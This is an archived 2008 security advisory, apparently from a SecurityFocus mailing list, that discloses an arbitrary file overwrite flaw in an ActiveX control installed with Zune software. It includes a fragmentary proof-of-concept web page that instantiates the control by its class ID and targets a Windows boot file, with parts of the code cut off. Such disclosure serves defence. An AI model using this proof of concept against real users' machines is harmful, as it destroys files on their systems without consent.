Zune software - arbitrary file overwrite Apr 23 2008 07:34AM
info ilionsecurity ch
Vulnerability class : Arbitrary file overwrite

Discovery date : 21 April 2008

Remote : Yes

Credits : J. Bachmann & B. Mariani from ilion Research Labs

Vulnerable : Zune software: EncProfile2 Class

An arbitrary file overwrite as been discovered in an ActiveX control installed with the Zune software package.

If a user visits the malicious page and authorize the control to run (it is not marked safe for scripting), the attacker can erase an arbitrary file.




<object id=ctrl classid="clsid:{0B1C3B47-207F-4CEA-8F31-34E4DB2F6EFD}"></object>


function Do_it()


File = "c:\\boot_.ini"




<input language=JavaScript onclick=Do_it() type=button value="Proof of




[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus